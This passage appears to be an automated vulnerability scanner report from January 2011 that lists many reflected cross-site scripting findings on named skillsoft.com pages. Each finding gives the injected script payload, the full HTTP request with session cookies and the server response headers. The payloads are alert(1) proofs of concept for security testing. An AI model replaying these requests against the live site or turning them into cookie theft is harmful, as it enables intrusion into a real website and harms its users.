GET /about/case_studies.asp?e3e61"><script>alert(1)</script>95470158500=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 117983 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:45:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The value of the order request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68381"><script>alert(1)</script>c72762c0b5d was submitted in the order parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/case_studies.asp?sort=case_study&order=descending68381"><script>alert(1)</script>c72762c0b5d HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 118013 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e3c"><script>alert(1)</script>bc55161493f was submitted in the sort parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/case_studies.asp?sort=case_studyc0e3c"><script>alert(1)</script>bc55161493f&order=descending HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 118013 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.22. http://skillsoft.com/about/company_history.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/company_history.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39695"><script>alert(1)</script>fe3c48a9787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/company_history.asp?39695"><script>alert(1)</script>fe3c48a9787=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40851 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.23. http://skillsoft.com/about/contact/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/contact/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dedc"><script>alert(1)</script>e599050bd3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/contact/default.asp?2dedc"><script>alert(1)</script>e599050bd3b=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42688 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.24. http://skillsoft.com/about/credit_programs/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/credit_programs/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ed9"><script>alert(1)</script>3597c79e6d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/credit_programs/?10ed9"><script>alert(1)</script>3597c79e6d7=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40884 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a11e0"><script>alert(1)</script>90a67085b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/credit_programs/academic_credit_programs/default.asp?a11e0"><script>alert(1)</script>90a67085b8d=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 43043 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e5a"><script>alert(1)</script>bcae9721eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/credit_programs/credential_programs/default.asp?a6e5a"><script>alert(1)</script>bcae9721eef=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41613 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.27. http://skillsoft.com/about/customers.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/customers.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf582"><script>alert(1)</script>957bccd228d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/customers.asp?cf582"><script>alert(1)</script>957bccd228d=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40275 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.28. http://skillsoft.com/about/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3a5"><script>alert(1)</script>41ed2bafdb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/default.asp?2b3a5"><script>alert(1)</script>41ed2bafdb4=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44070 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.29. http://skillsoft.com/about/future_direction.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/future_direction.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac53"><script>alert(1)</script>96153b585d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/future_direction.asp?5ac53"><script>alert(1)</script>96153b585d4=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41218 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.30. http://skillsoft.com/about/instructional_design.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/instructional_design.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74a10"><script>alert(1)</script>8d77d024198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/instructional_design.asp?74a10"><script>alert(1)</script>8d77d024198=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42795 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.31. http://skillsoft.com/about/management_team.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/management_team.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66073"><script>alert(1)</script>bd2c0fc8468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/management_team.asp?66073"><script>alert(1)</script>bd2c0fc8468=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 51627 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.32. http://skillsoft.com/about/office_locations.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/office_locations.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e926d"><script>alert(1)</script>ec17a6b6c94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/office_locations.asp?e926d"><script>alert(1)</script>ec17a6b6c94=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45466 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.33. http://skillsoft.com/about/partners/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/partners/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6eb"><script>alert(1)</script>091904ce8e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/partners/?cf6eb"><script>alert(1)</script>091904ce8e4=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42362 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.34. http://skillsoft.com/about/partners/IT/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/partners/IT/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e085"><script>alert(1)</script>a191c9cb0b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/partners/IT/default.asp?7e085"><script>alert(1)</script>a191c9cb0b2=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41479 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.35. http://skillsoft.com/about/partners/channel/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/partners/channel/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf61"><script>alert(1)</script>044393a25e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/partners/channel/default.asp?9bf61"><script>alert(1)</script>044393a25e7=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 43255 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.36. http://skillsoft.com/about/partners/solutionpartners/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/partners/solutionpartners/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a93"><script>alert(1)</script>4379b1e7840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/partners/solutionpartners/default.asp?39a93"><script>alert(1)</script>4379b1e7840=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 43762 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.37. http://skillsoft.com/about/press_room/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/press_room/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d91ea"><script>alert(1)</script>2a148354c45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/press_room/?d91ea"><script>alert(1)</script>2a148354c45=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40778 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
